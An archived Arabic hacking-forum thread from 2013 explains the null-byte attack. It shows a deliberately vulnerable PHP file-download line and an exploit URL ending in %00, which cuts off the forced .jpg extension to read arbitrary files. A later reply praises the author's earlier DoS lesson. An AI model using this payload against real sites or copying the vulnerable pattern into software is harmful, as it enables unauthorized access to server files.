:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   Null Byte Attack (http://www.vbspiders.com/vb/t68471.html)

bleu moon 11-28-2013 12:07 AM
Null Byte Attack
 
السلام عليكم ورحمة الله تعالى وبركاته.
المهم... بالنسبه للمطلعين على البرمجه في السي ..

null byte = '\0'

وهو يكون في نهاية مصفوفات الحروف

مثلا :

كود PHP:
char C[]="nor15din"
في الذاكرة يتم تسجيل اسمي على الشكل التالي :

كود PHP:
'n' 'o' 'r' '1' '5' 'd' 'i' 'n' '\0' 
وبالتالي \0 ترمز الى نهاية المصفوفة ...

سنتطرق الى هذه الدروس في دورة السي، المهم :bleh:

نفترض عندنا سكربت يمكن من تحميل الصور فقط من السيرفر..

كود PHP:
readfile($_GET["image"] . ".jpg"); 
الاستغلال :

كود PHP:
http://www.site.com/download.php?image=file.txt%00 
ينفذ الامر هكذا في السيرفر :

كود PHP:
readfile("file.txt\0.jpg"); 
والسلام عليكم.. :)

mimo-dz 03-21-2018 07:51 PM
رد: Null Byte Attack
 
شكرا اخي نور الدين انت فاكر درسك اللعبة التي تدعم الدوس في اختراق السيرفرات كانت روعة مشكوووور


الساعة الآن 08:18 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0